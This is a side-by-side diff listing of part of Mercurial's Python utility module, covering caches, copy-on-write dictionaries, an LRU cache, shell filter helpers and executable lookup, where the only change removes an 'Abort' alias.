1139 def f():
1140 if len(cache) == 0:
1140 if len(cache) == 0:
1141 cache.append(func())
1141 cache.append(func())
1142 return cache[0]
1142 return cache[0]
1143 return f
1143 return f
1144 cache = {}
1144 cache = {}
1145 if func.__code__.co_argcount == 1:
1145 if func.__code__.co_argcount == 1:
1146 # we gain a small amount of time because
1146 # we gain a small amount of time because
1147 # we don't need to pack/unpack the list
1147 # we don't need to pack/unpack the list
1148 def f(arg):
1148 def f(arg):
1149 if arg not in cache:
1149 if arg not in cache:
1150 cache[arg] = func(arg)
1150 cache[arg] = func(arg)
1151 return cache[arg]
1151 return cache[arg]
1152 else:
1152 else:
1153 def f(*args):
1153 def f(*args):
1154 if args not in cache:
1154 if args not in cache:
1155 cache[args] = func(*args)
1155 cache[args] = func(*args)
1156 return cache[args]
1156 return cache[args]
1157
1157
1158 return f
1158 return f
1159
1159
1160 class cow(object):
1160 class cow(object):
1161 """helper class to make copy-on-write easier
1161 """helper class to make copy-on-write easier
1162
1162
1163 Call preparewrite before doing any writes.
1163 Call preparewrite before doing any writes.
1164 """
1164 """
1165
1165
1166 def preparewrite(self):
1166 def preparewrite(self):
1167 """call this before writes, return self or a copied new object"""
1167 """call this before writes, return self or a copied new object"""
1168 if getattr(self, '_copied', 0):
1168 if getattr(self, '_copied', 0):
1169 self._copied -= 1
1169 self._copied -= 1
1170 return self.__class__(self)
1170 return self.__class__(self)
1171 return self
1171 return self
1172
1172
1173 def copy(self):
1173 def copy(self):
1174 """always do a cheap copy"""
1174 """always do a cheap copy"""
1175 self._copied = getattr(self, '_copied', 0) + 1
1175 self._copied = getattr(self, '_copied', 0) + 1
1176 return self
1176 return self
1177
1177
1178 class sortdict(collections.OrderedDict):
1178 class sortdict(collections.OrderedDict):
1179 '''a simple sorted dictionary
1179 '''a simple sorted dictionary
1180
1180
1181 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1181 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1182 >>> d2 = d1.copy()
1182 >>> d2 = d1.copy()
1183 >>> d2
1183 >>> d2
1184 sortdict([('a', 0), ('b', 1)])
1184 sortdict([('a', 0), ('b', 1)])
1185 >>> d2.update([(b'a', 2)])
1185 >>> d2.update([(b'a', 2)])
1186 >>> list(d2.keys()) # should still be in last-set order
1186 >>> list(d2.keys()) # should still be in last-set order
1187 ['b', 'a']
1187 ['b', 'a']
1188 '''
1188 '''
1189
1189
1190 def __setitem__(self, key, value):
1190 def __setitem__(self, key, value):
1191 if key in self:
1191 if key in self:
1192 del self[key]
1192 del self[key]
1193 super(sortdict, self).__setitem__(key, value)
1193 super(sortdict, self).__setitem__(key, value)
1194
1194
1195 if pycompat.ispypy:
1195 if pycompat.ispypy:
1196 # __setitem__() isn't called as of PyPy 5.8.0
1196 # __setitem__() isn't called as of PyPy 5.8.0
1197 def update(self, src):
1197 def update(self, src):
1198 if isinstance(src, dict):
1198 if isinstance(src, dict):
1199 src = src.iteritems()
1199 src = src.iteritems()
1200 for k, v in src:
1200 for k, v in src:
1201 self[k] = v
1201 self[k] = v
1202
1202
1203 class cowdict(cow, dict):
1203 class cowdict(cow, dict):
1204 """copy-on-write dict
1204 """copy-on-write dict
1205
1205
1206 Be sure to call d = d.preparewrite() before writing to d.
1206 Be sure to call d = d.preparewrite() before writing to d.
1207
1207
1208 >>> a = cowdict()
1208 >>> a = cowdict()
1209 >>> a is a.preparewrite()
1209 >>> a is a.preparewrite()
1210 True
1210 True
1211 >>> b = a.copy()
1211 >>> b = a.copy()
1212 >>> b is a
1212 >>> b is a
1213 True
1213 True
1214 >>> c = b.copy()
1214 >>> c = b.copy()
1215 >>> c is a
1215 >>> c is a
1216 True
1216 True
1217 >>> a = a.preparewrite()
1217 >>> a = a.preparewrite()
1218 >>> b is a
1218 >>> b is a
1219 False
1219 False
1220 >>> a is a.preparewrite()
1220 >>> a is a.preparewrite()
1221 True
1221 True
1222 >>> c = c.preparewrite()
1222 >>> c = c.preparewrite()
1223 >>> b is c
1223 >>> b is c
1224 False
1224 False
1225 >>> b is b.preparewrite()
1225 >>> b is b.preparewrite()
1226 True
1226 True
1227 """
1227 """
1228
1228
1229 class cowsortdict(cow, sortdict):
1229 class cowsortdict(cow, sortdict):
1230 """copy-on-write sortdict
1230 """copy-on-write sortdict
1231
1231
1232 Be sure to call d = d.preparewrite() before writing to d.
1232 Be sure to call d = d.preparewrite() before writing to d.
1233 """
1233 """
1234
1234
1235 class transactional(object):
1235 class transactional(object):
1236 """Base class for making a transactional type into a context manager."""
1236 """Base class for making a transactional type into a context manager."""
1237 __metaclass__ = abc.ABCMeta
1237 __metaclass__ = abc.ABCMeta
1238
1238
1239 @abc.abstractmethod
1239 @abc.abstractmethod
1240 def close(self):
1240 def close(self):
1241 """Successfully closes the transaction."""
1241 """Successfully closes the transaction."""
1242
1242
1243 @abc.abstractmethod
1243 @abc.abstractmethod
1244 def release(self):
1244 def release(self):
1245 """Marks the end of the transaction.
1245 """Marks the end of the transaction.
1246
1246
1247 If the transaction has not been closed, it will be aborted.
1247 If the transaction has not been closed, it will be aborted.
1248 """
1248 """
1249
1249
1250 def __enter__(self):
1250 def __enter__(self):
1251 return self
1251 return self
1252
1252
1253 def __exit__(self, exc_type, exc_val, exc_tb):
1253 def __exit__(self, exc_type, exc_val, exc_tb):
1254 try:
1254 try:
1255 if exc_type is None:
1255 if exc_type is None:
1256 self.close()
1256 self.close()
1257 finally:
1257 finally:
1258 self.release()
1258 self.release()
1259
1259
1260 @contextlib.contextmanager
1260 @contextlib.contextmanager
1261 def acceptintervention(tr=None):
1261 def acceptintervention(tr=None):
1262 """A context manager that closes the transaction on InterventionRequired
1262 """A context manager that closes the transaction on InterventionRequired
1263
1263
1264 If no transaction was provided, this simply runs the body and returns
1264 If no transaction was provided, this simply runs the body and returns
1265 """
1265 """
1266 if not tr:
1266 if not tr:
1267 yield
1267 yield
1268 return
1268 return
1269 try:
1269 try:
1270 yield
1270 yield
1271 tr.close()
1271 tr.close()
1272 except error.InterventionRequired:
1272 except error.InterventionRequired:
1273 tr.close()
1273 tr.close()
1274 raise
1274 raise
1275 finally:
1275 finally:
1276 tr.release()
1276 tr.release()
1277
1277
1278 @contextlib.contextmanager
1278 @contextlib.contextmanager
1279 def nullcontextmanager():
1279 def nullcontextmanager():
1280 yield
1280 yield
1281
1281
1282 class _lrucachenode(object):
1282 class _lrucachenode(object):
1283 """A node in a doubly linked list.
1283 """A node in a doubly linked list.
1284
1284
1285 Holds a reference to nodes on either side as well as a key-value
1285 Holds a reference to nodes on either side as well as a key-value
1286 pair for the dictionary entry.
1286 pair for the dictionary entry.
1287 """
1287 """
1288 __slots__ = (u'next', u'prev', u'key', u'value')
1288 __slots__ = (u'next', u'prev', u'key', u'value')
1289
1289
1290 def __init__(self):
1290 def __init__(self):
1291 self.next = None
1291 self.next = None
1292 self.prev = None
1292 self.prev = None
1293
1293
1294 self.key = _notset
1294 self.key = _notset
1295 self.value = None
1295 self.value = None
1296
1296
1297 def markempty(self):
1297 def markempty(self):
1298 """Mark the node as emptied."""
1298 """Mark the node as emptied."""
1299 self.key = _notset
1299 self.key = _notset
1300
1300
1301 class lrucachedict(object):
1301 class lrucachedict(object):
1302 """Dict that caches most recent accesses and sets.
1302 """Dict that caches most recent accesses and sets.
1303
1303
1304 The dict consists of an actual backing dict - indexed by original
1304 The dict consists of an actual backing dict - indexed by original
1305 key - and a doubly linked circular list defining the order of entries in
1305 key - and a doubly linked circular list defining the order of entries in
1306 the cache.
1306 the cache.
1307
1307
1308 The head node is the newest entry in the cache. If the cache is full,
1308 The head node is the newest entry in the cache. If the cache is full,
1309 we recycle head.prev and make it the new head. Cache accesses result in
1309 we recycle head.prev and make it the new head. Cache accesses result in
1310 the node being moved to before the existing head and being marked as the
1310 the node being moved to before the existing head and being marked as the
1311 new head node.
1311 new head node.
1312 """
1312 """
1313 def __init__(self, max):
1313 def __init__(self, max):
1314 self._cache = {}
1314 self._cache = {}
1315
1315
1316 self._head = head = _lrucachenode()
1316 self._head = head = _lrucachenode()
1317 head.prev = head
1317 head.prev = head
1318 head.next = head
1318 head.next = head
1319 self._size = 1
1319 self._size = 1
1320 self._capacity = max
1320 self._capacity = max
1321
1321
1322 def __len__(self):
1322 def __len__(self):
1323 return len(self._cache)
1323 return len(self._cache)
1324
1324
1325 def __contains__(self, k):
1325 def __contains__(self, k):
1326 return k in self._cache
1326 return k in self._cache
1327
1327
1328 def __iter__(self):
1328 def __iter__(self):
1329 # We don't have to iterate in cache order, but why not.
1329 # We don't have to iterate in cache order, but why not.
1330 n = self._head
1330 n = self._head
1331 for i in range(len(self._cache)):
1331 for i in range(len(self._cache)):
1332 yield n.key
1332 yield n.key
1333 n = n.next
1333 n = n.next
1334
1334
1335 def __getitem__(self, k):
1335 def __getitem__(self, k):
1336 node = self._cache[k]
1336 node = self._cache[k]
1337 self._movetohead(node)
1337 self._movetohead(node)
1338 return node.value
1338 return node.value
1339
1339
1340 def __setitem__(self, k, v):
1340 def __setitem__(self, k, v):
1341 node = self._cache.get(k)
1341 node = self._cache.get(k)
1342 # Replace existing value and mark as newest.
1342 # Replace existing value and mark as newest.
1343 if node is not None:
1343 if node is not None:
1344 node.value = v
1344 node.value = v
1345 self._movetohead(node)
1345 self._movetohead(node)
1346 return
1346 return
1347
1347
1348 if self._size < self._capacity:
1348 if self._size < self._capacity:
1349 node = self._addcapacity()
1349 node = self._addcapacity()
1350 else:
1350 else:
1351 # Grab the last/oldest item.
1351 # Grab the last/oldest item.
1352 node = self._head.prev
1352 node = self._head.prev
1353
1353
1354 # At capacity. Kill the old entry.
1354 # At capacity. Kill the old entry.
1355 if node.key is not _notset:
1355 if node.key is not _notset:
1356 del self._cache[node.key]
1356 del self._cache[node.key]
1357
1357
1358 node.key = k
1358 node.key = k
1359 node.value = v
1359 node.value = v
1360 self._cache[k] = node
1360 self._cache[k] = node
1361 # And mark it as newest entry. No need to adjust order since it
1361 # And mark it as newest entry. No need to adjust order since it
1362 # is already self._head.prev.
1362 # is already self._head.prev.
1363 self._head = node
1363 self._head = node
1364
1364
1365 def __delitem__(self, k):
1365 def __delitem__(self, k):
1366 node = self._cache.pop(k)
1366 node = self._cache.pop(k)
1367 node.markempty()
1367 node.markempty()
1368
1368
1369 # Temporarily mark as newest item before re-adjusting head to make
1369 # Temporarily mark as newest item before re-adjusting head to make
1370 # this node the oldest item.
1370 # this node the oldest item.
1371 self._movetohead(node)
1371 self._movetohead(node)
1372 self._head = node.next
1372 self._head = node.next
1373
1373
1374 # Additional dict methods.
1374 # Additional dict methods.
1375
1375
1376 def get(self, k, default=None):
1376 def get(self, k, default=None):
1377 try:
1377 try:
1378 return self._cache[k].value
1378 return self._cache[k].value
1379 except KeyError:
1379 except KeyError:
1380 return default
1380 return default
1381
1381
1382 def clear(self):
1382 def clear(self):
1383 n = self._head
1383 n = self._head
1384 while n.key is not _notset:
1384 while n.key is not _notset:
1385 n.markempty()
1385 n.markempty()
1386 n = n.next
1386 n = n.next
1387
1387
1388 self._cache.clear()
1388 self._cache.clear()
1389
1389
1390 def copy(self):
1390 def copy(self):
1391 result = lrucachedict(self._capacity)
1391 result = lrucachedict(self._capacity)
1392 n = self._head.prev
1392 n = self._head.prev
1393 # Iterate in oldest-to-newest order, so the copy has the right ordering
1393 # Iterate in oldest-to-newest order, so the copy has the right ordering
1394 for i in range(len(self._cache)):
1394 for i in range(len(self._cache)):
1395 result[n.key] = n.value
1395 result[n.key] = n.value
1396 n = n.prev
1396 n = n.prev
1397 return result
1397 return result
1398
1398
1399 def _movetohead(self, node):
1399 def _movetohead(self, node):
1400 """Mark a node as the newest, making it the new head.
1400 """Mark a node as the newest, making it the new head.
1401
1401
1402 When a node is accessed, it becomes the freshest entry in the LRU
1402 When a node is accessed, it becomes the freshest entry in the LRU
1403 list, which is denoted by self._head.
1403 list, which is denoted by self._head.
1404
1404
1405 Visually, let's make ``N`` the new head node (* denotes head):
1405 Visually, let's make ``N`` the new head node (* denotes head):
1406
1406
1407 previous/oldest <-> head <-> next/next newest
1407 previous/oldest <-> head <-> next/next newest
1408
1408
1409 ----<->--- A* ---<->-----
1409 ----<->--- A* ---<->-----
1410 | |
1410 | |
1411 E <-> D <-> N <-> C <-> B
1411 E <-> D <-> N <-> C <-> B
1412
1412
1413 To:
1413 To:
1414
1414
1415 ----<->--- N* ---<->-----
1415 ----<->--- N* ---<->-----
1416 | |
1416 | |
1417 E <-> D <-> C <-> B <-> A
1417 E <-> D <-> C <-> B <-> A
1418
1418
1419 This requires the following moves:
1419 This requires the following moves:
1420
1420
1421 C.next = D (node.prev.next = node.next)
1421 C.next = D (node.prev.next = node.next)
1422 D.prev = C (node.next.prev = node.prev)
1422 D.prev = C (node.next.prev = node.prev)
1423 E.next = N (head.prev.next = node)
1423 E.next = N (head.prev.next = node)
1424 N.prev = E (node.prev = head.prev)
1424 N.prev = E (node.prev = head.prev)
1425 N.next = A (node.next = head)
1425 N.next = A (node.next = head)
1426 A.prev = N (head.prev = node)
1426 A.prev = N (head.prev = node)
1427 """
1427 """
1428 head = self._head
1428 head = self._head
1429 # C.next = D
1429 # C.next = D
1430 node.prev.next = node.next
1430 node.prev.next = node.next
1431 # D.prev = C
1431 # D.prev = C
1432 node.next.prev = node.prev
1432 node.next.prev = node.prev
1433 # N.prev = E
1433 # N.prev = E
1434 node.prev = head.prev
1434 node.prev = head.prev
1435 # N.next = A
1435 # N.next = A
1436 # It is tempting to do just "head" here, however if node is
1436 # It is tempting to do just "head" here, however if node is
1437 # adjacent to head, this will do bad things.
1437 # adjacent to head, this will do bad things.
1438 node.next = head.prev.next
1438 node.next = head.prev.next
1439 # E.next = N
1439 # E.next = N
1440 node.next.prev = node
1440 node.next.prev = node
1441 # A.prev = N
1441 # A.prev = N
1442 node.prev.next = node
1442 node.prev.next = node
1443
1443
1444 self._head = node
1444 self._head = node
1445
1445
1446 def _addcapacity(self):
1446 def _addcapacity(self):
1447 """Add a node to the circular linked list.
1447 """Add a node to the circular linked list.
1448
1448
1449 The new node is inserted before the head node.
1449 The new node is inserted before the head node.
1450 """
1450 """
1451 head = self._head
1451 head = self._head
1452 node = _lrucachenode()
1452 node = _lrucachenode()
1453 head.prev.next = node
1453 head.prev.next = node
1454 node.prev = head.prev
1454 node.prev = head.prev
1455 node.next = head
1455 node.next = head
1456 head.prev = node
1456 head.prev = node
1457 self._size += 1
1457 self._size += 1
1458 return node
1458 return node
1459
1459
1460 def lrucachefunc(func):
1460 def lrucachefunc(func):
1461 '''cache most recent results of function calls'''
1461 '''cache most recent results of function calls'''
1462 cache = {}
1462 cache = {}
1463 order = collections.deque()
1463 order = collections.deque()
1464 if func.__code__.co_argcount == 1:
1464 if func.__code__.co_argcount == 1:
1465 def f(arg):
1465 def f(arg):
1466 if arg not in cache:
1466 if arg not in cache:
1467 if len(cache) > 20:
1467 if len(cache) > 20:
1468 del cache[order.popleft()]
1468 del cache[order.popleft()]
1469 cache[arg] = func(arg)
1469 cache[arg] = func(arg)
1470 else:
1470 else:
1471 order.remove(arg)
1471 order.remove(arg)
1472 order.append(arg)
1472 order.append(arg)
1473 return cache[arg]
1473 return cache[arg]
1474 else:
1474 else:
1475 def f(*args):
1475 def f(*args):
1476 if args not in cache:
1476 if args not in cache:
1477 if len(cache) > 20:
1477 if len(cache) > 20:
1478 del cache[order.popleft()]
1478 del cache[order.popleft()]
1479 cache[args] = func(*args)
1479 cache[args] = func(*args)
1480 else:
1480 else:
1481 order.remove(args)
1481 order.remove(args)
1482 order.append(args)
1482 order.append(args)
1483 return cache[args]
1483 return cache[args]
1484
1484
1485 return f
1485 return f
1486
1486
1487 class propertycache(object):
1487 class propertycache(object):
1488 def __init__(self, func):
1488 def __init__(self, func):
1489 self.func = func
1489 self.func = func
1490 self.name = func.__name__
1490 self.name = func.__name__
1491 def __get__(self, obj, type=None):
1491 def __get__(self, obj, type=None):
1492 result = self.func(obj)
1492 result = self.func(obj)
1493 self.cachevalue(obj, result)
1493 self.cachevalue(obj, result)
1494 return result
1494 return result
1495
1495
1496 def cachevalue(self, obj, value):
1496 def cachevalue(self, obj, value):
1497 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1497 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1498 obj.__dict__[self.name] = value
1498 obj.__dict__[self.name] = value
1499
1499
1500 def clearcachedproperty(obj, prop):
1500 def clearcachedproperty(obj, prop):
1501 '''clear a cached property value, if one has been set'''
1501 '''clear a cached property value, if one has been set'''
1502 if prop in obj.__dict__:
1502 if prop in obj.__dict__:
1503 del obj.__dict__[prop]
1503 del obj.__dict__[prop]
1504
1504
1505 def pipefilter(s, cmd):
1505 def pipefilter(s, cmd):
1506 '''filter string S through command CMD, returning its output'''
1506 '''filter string S through command CMD, returning its output'''
1507 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1507 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1508 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
1508 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
1509 pout, perr = p.communicate(s)
1509 pout, perr = p.communicate(s)
1510 return pout
1510 return pout
1511
1511
1512 def tempfilter(s, cmd):
1512 def tempfilter(s, cmd):
1513 '''filter string S through a pair of temporary files with CMD.
1513 '''filter string S through a pair of temporary files with CMD.
1514 CMD is used as a template to create the real command to be run,
1514 CMD is used as a template to create the real command to be run,
1515 with the strings INFILE and OUTFILE replaced by the real names of
1515 with the strings INFILE and OUTFILE replaced by the real names of
1516 the temporary files generated.'''
1516 the temporary files generated.'''
1517 inname, outname = None, None
1517 inname, outname = None, None
1518 try:
1518 try:
1519 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
1519 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
1520 fp = os.fdopen(infd, r'wb')
1520 fp = os.fdopen(infd, r'wb')
1521 fp.write(s)
1521 fp.write(s)
1522 fp.close()
1522 fp.close()
1523 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
1523 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
1524 os.close(outfd)
1524 os.close(outfd)
1525 cmd = cmd.replace('INFILE', inname)
1525 cmd = cmd.replace('INFILE', inname)
1526 cmd = cmd.replace('OUTFILE', outname)
1526 cmd = cmd.replace('OUTFILE', outname)
1527 code = os.system(cmd)
1527 code = os.system(cmd)
1528 if pycompat.sysplatform == 'OpenVMS' and code & 1:
1528 if pycompat.sysplatform == 'OpenVMS' and code & 1:
1529 code = 0
1529 code = 0
1530 if code:
1530 if code:
1531 raise error.Abort(_("command '%s' failed: %s") %
1531 raise error.Abort(_("command '%s' failed: %s") %
1532 (cmd, explainexit(code)))
1532 (cmd, explainexit(code)))
1533 return readfile(outname)
1533 return readfile(outname)
1534 finally:
1534 finally:
1535 try:
1535 try:
1536 if inname:
1536 if inname:
1537 os.unlink(inname)
1537 os.unlink(inname)
1538 except OSError:
1538 except OSError:
1539 pass
1539 pass
1540 try:
1540 try:
1541 if outname:
1541 if outname:
1542 os.unlink(outname)
1542 os.unlink(outname)
1543 except OSError:
1543 except OSError:
1544 pass
1544 pass
1545
1545
1546 filtertable = {
1546 filtertable = {
1547 'tempfile:': tempfilter,
1547 'tempfile:': tempfilter,
1548 'pipe:': pipefilter,
1548 'pipe:': pipefilter,
1549 }
1549 }
1550
1550
1551 def filter(s, cmd):
1551 def filter(s, cmd):
1552 "filter a string through a command that transforms its input to its output"
1552 "filter a string through a command that transforms its input to its output"
1553 for name, fn in filtertable.iteritems():
1553 for name, fn in filtertable.iteritems():
1554 if cmd.startswith(name):
1554 if cmd.startswith(name):
1555 return fn(s, cmd[len(name):].lstrip())
1555 return fn(s, cmd[len(name):].lstrip())
1556 return pipefilter(s, cmd)
1556 return pipefilter(s, cmd)
1557
1557
1558 def increasingchunks(source, min=1024, max=65536):
1558 def increasingchunks(source, min=1024, max=65536):
1559 '''return no less than min bytes per chunk while data remains,
1559 '''return no less than min bytes per chunk while data remains,
1560 doubling min after each chunk until it reaches max'''
1560 doubling min after each chunk until it reaches max'''
1561 def log2(x):
1561 def log2(x):
1562 if not x:
1562 if not x:
1563 return 0
1563 return 0
1564 i = 0
1564 i = 0
1565 while x:
1565 while x:
1566 x >>= 1
1566 x >>= 1
1567 i += 1
1567 i += 1
1568 return i - 1
1568 return i - 1
1569
1569
1570 buf = []
1570 buf = []
1571 blen = 0
1571 blen = 0
1572 for chunk in source:
1572 for chunk in source:
1573 buf.append(chunk)
1573 buf.append(chunk)
1574 blen += len(chunk)
1574 blen += len(chunk)
1575 if blen >= min:
1575 if blen >= min:
1576 if min < max:
1576 if min < max:
1577 min = min << 1
1577 min = min << 1
1578 nmin = 1 << log2(blen)
1578 nmin = 1 << log2(blen)
1579 if nmin > min:
1579 if nmin > min:
1580 min = nmin
1580 min = nmin
1581 if min > max:
1581 if min > max:
1582 min = max
1582 min = max
1583 yield ''.join(buf)
1583 yield ''.join(buf)
1584 blen = 0
1584 blen = 0
1585 buf = []
1585 buf = []
1586 if buf:
1586 if buf:
1587 yield ''.join(buf)
1587 yield ''.join(buf)
1588
1588
1589 Abort = error.Abort
1590
1591 def always(fn):
1589 def always(fn):
1592 return True
1590 return True
1593
1591
1594 def never(fn):
1592 def never(fn):
1595 return False
1593 return False
1596
1594
1597 def nogc(func):
1595 def nogc(func):
1598 """disable garbage collector
1596 """disable garbage collector
1599
1597
1600 Python's garbage collector triggers a GC each time a certain number of
1598 Python's garbage collector triggers a GC each time a certain number of
1601 container objects (the number being defined by gc.get_threshold()) are
1599 container objects (the number being defined by gc.get_threshold()) are
1602 allocated even when marked not to be tracked by the collector. Tracking has
1600 allocated even when marked not to be tracked by the collector. Tracking has
1603 no effect on when GCs are triggered, only on what objects the GC looks
1601 no effect on when GCs are triggered, only on what objects the GC looks
1604 into. As a workaround, disable GC while building complex (huge)
1602 into. As a workaround, disable GC while building complex (huge)
1605 containers.
1603 containers.
1606
1604
1607 This garbage collector issue have been fixed in 2.7. But it still affect
1605 This garbage collector issue have been fixed in 2.7. But it still affect
1608 CPython's performance.
1606 CPython's performance.
1609 """
1607 """
1610 def wrapper(*args, **kwargs):
1608 def wrapper(*args, **kwargs):
1611 gcenabled = gc.isenabled()
1609 gcenabled = gc.isenabled()
1612 gc.disable()
1610 gc.disable()
1613 try:
1611 try:
1614 return func(*args, **kwargs)
1612 return func(*args, **kwargs)
1615 finally:
1613 finally:
1616 if gcenabled:
1614 if gcenabled:
1617 gc.enable()
1615 gc.enable()
1618 return wrapper
1616 return wrapper
1619
1617
1620 if pycompat.ispypy:
1618 if pycompat.ispypy:
1621 # PyPy runs slower with gc disabled
1619 # PyPy runs slower with gc disabled
1622 nogc = lambda x: x
1620 nogc = lambda x: x
1623
1621
1624 def pathto(root, n1, n2):
1622 def pathto(root, n1, n2):
1625 '''return the relative path from one place to another.
1623 '''return the relative path from one place to another.
1626 root should use os.sep to separate directories
1624 root should use os.sep to separate directories
1627 n1 should use os.sep to separate directories
1625 n1 should use os.sep to separate directories
1628 n2 should use "/" to separate directories
1626 n2 should use "/" to separate directories
1629 returns an os.sep-separated path.
1627 returns an os.sep-separated path.
1630
1628
1631 If n1 is a relative path, it's assumed it's
1629 If n1 is a relative path, it's assumed it's
1632 relative to root.
1630 relative to root.
1633 n2 should always be relative to root.
1631 n2 should always be relative to root.
1634 '''
1632 '''
1635 if not n1:
1633 if not n1:
1636 return localpath(n2)
1634 return localpath(n2)
1637 if os.path.isabs(n1):
1635 if os.path.isabs(n1):
1638 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1636 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1639 return os.path.join(root, localpath(n2))
1637 return os.path.join(root, localpath(n2))
1640 n2 = '/'.join((pconvert(root), n2))
1638 n2 = '/'.join((pconvert(root), n2))
1641 a, b = splitpath(n1), n2.split('/')
1639 a, b = splitpath(n1), n2.split('/')
1642 a.reverse()
1640 a.reverse()
1643 b.reverse()
1641 b.reverse()
1644 while a and b and a[-1] == b[-1]:
1642 while a and b and a[-1] == b[-1]:
1645 a.pop()
1643 a.pop()
1646 b.pop()
1644 b.pop()
1647 b.reverse()
1645 b.reverse()
1648 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1646 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1649
1647
1650 def mainfrozen():
1648 def mainfrozen():
1651 """return True if we are a frozen executable.
1649 """return True if we are a frozen executable.
1652
1650
1653 The code supports py2exe (most common, Windows only) and tools/freeze
1651 The code supports py2exe (most common, Windows only) and tools/freeze
1654 (portable, not much used).
1652 (portable, not much used).
1655 """
1653 """
1656 return (safehasattr(sys, "frozen") or # new py2exe
1654 return (safehasattr(sys, "frozen") or # new py2exe
1657 safehasattr(sys, "importers") or # old py2exe
1655 safehasattr(sys, "importers") or # old py2exe
1658 imp.is_frozen(u"__main__")) # tools/freeze
1656 imp.is_frozen(u"__main__")) # tools/freeze
1659
1657
1660 # the location of data files matching the source code
1658 # the location of data files matching the source code
1661 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1659 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1662 # executable version (py2exe) doesn't support __file__
1660 # executable version (py2exe) doesn't support __file__
1663 datapath = os.path.dirname(pycompat.sysexecutable)
1661 datapath = os.path.dirname(pycompat.sysexecutable)
1664 else:
1662 else:
1665 datapath = os.path.dirname(pycompat.fsencode(__file__))
1663 datapath = os.path.dirname(pycompat.fsencode(__file__))
1666
1664
1667 i18n.setdatapath(datapath)
1665 i18n.setdatapath(datapath)
1668
1666
1669 _hgexecutable = None
1667 _hgexecutable = None
1670
1668
1671 def hgexecutable():
1669 def hgexecutable():
1672 """return location of the 'hg' executable.
1670 """return location of the 'hg' executable.
1673
1671
1674 Defaults to $HG or 'hg' in the search path.
1672 Defaults to $HG or 'hg' in the search path.
1675 """
1673 """
1676 if _hgexecutable is None:
1674 if _hgexecutable is None:
1677 hg = encoding.environ.get('HG')
1675 hg = encoding.environ.get('HG')
1678 mainmod = sys.modules[r'__main__']
1676 mainmod = sys.modules[r'__main__']
1679 if hg:
1677 if hg:
1680 _sethgexecutable(hg)
1678 _sethgexecutable(hg)
1681 elif mainfrozen():
1679 elif mainfrozen():
1682 if getattr(sys, 'frozen', None) == 'macosx_app':
1680 if getattr(sys, 'frozen', None) == 'macosx_app':
1683 # Env variable set by py2app
1681 # Env variable set by py2app
1684 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1682 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1685 else:
1683 else:
1686 _sethgexecutable(pycompat.sysexecutable)
1684 _sethgexecutable(pycompat.sysexecutable)
1687 elif (os.path.basename(
1685 elif (os.path.basename(
1688 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1686 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1689 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1687 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1690 else:
1688 else:
1691 exe = findexe('hg') or os.path.basename(sys.argv[0])
1689 exe = findexe('hg') or os.path.basename(sys.argv[0])
1692 _sethgexecutable(exe)
1690 _sethgexecutable(exe)
1693 return _hgexecutable
1691 return _hgexecutable
1694
1692
1695 def _sethgexecutable(path):
1693 def _sethgexecutable(path):
1696 """set location of the 'hg' executable"""
1694 """set location of the 'hg' executable"""
1697 global _hgexecutable
1695 global _hgexecutable
1698 _hgexecutable = path
1696 _hgexecutable = path
1699
1697
1700 def _testfileno(f, stdf):
1698 def _testfileno(f, stdf):
1701 fileno = getattr(f, 'fileno', None)
1699 fileno = getattr(f, 'fileno', None)
1702 try:
1700 try:
1703 return fileno and fileno() == stdf.fileno()
1701 return fileno and fileno() == stdf.fileno()
1704 except io.UnsupportedOperation:
1702 except io.UnsupportedOperation:
1705 return False # fileno() raised UnsupportedOperation
1703 return False # fileno() raised UnsupportedOperation
1706
1704
1707 def isstdin(f):
1705 def isstdin(f):
1708 return _testfileno(f, sys.__stdin__)
1706 return _testfileno(f, sys.__stdin__)
1709
1707
1710 def isstdout(f):
1708 def isstdout(f):
1711 return _testfileno(f, sys.__stdout__)
1709 return _testfileno(f, sys.__stdout__)
1712
1710
1713 def shellenviron(environ=None):
1711 def shellenviron(environ=None):
1714 """return environ with optional override, useful for shelling out"""
1712 """return environ with optional override, useful for shelling out"""
1715 def py2shell(val):
1713 def py2shell(val):
1716 'convert python object into string that is useful to shell'
1714 'convert python object into string that is useful to shell'
1717 if val is None or val is False:
1715 if val is None or val is False:
1718 return '0'
1716 return '0'
1719 if val is True:
1717 if val is True:
1720 return '1'
1718 return '1'
1721 return pycompat.bytestr(val)
1719 return pycompat.bytestr(val)
1722 env = dict(encoding.environ)
1720 env = dict(encoding.environ)
1723 if environ:
1721 if environ:
1724 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1722 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1725 env['HG'] = hgexecutable()
1723 env['HG'] = hgexecutable()
1726 return env
1724 return env
1727
1725
1728 def system(cmd, environ=None, cwd=None, out=None):
1726 def system(cmd, environ=None, cwd=None, out=None):
1729 '''enhanced shell command execution.
1727 '''enhanced shell command execution.
1730 run with environment maybe modified, maybe in different dir.
1728 run with environment maybe modified, maybe in different dir.
1731
1729
1732 if out is specified, it is assumed to be a file-like object that has a
1730 if out is specified, it is assumed to be a file-like object that has a
1733 write() method. stdout and stderr will be redirected to out.'''
1731 write() method. stdout and stderr will be redirected to out.'''
1734 try:
1732 try:
1735 stdout.flush()
1733 stdout.flush()
1736 except Exception:
1734 except Exception:
1737 pass
1735 pass
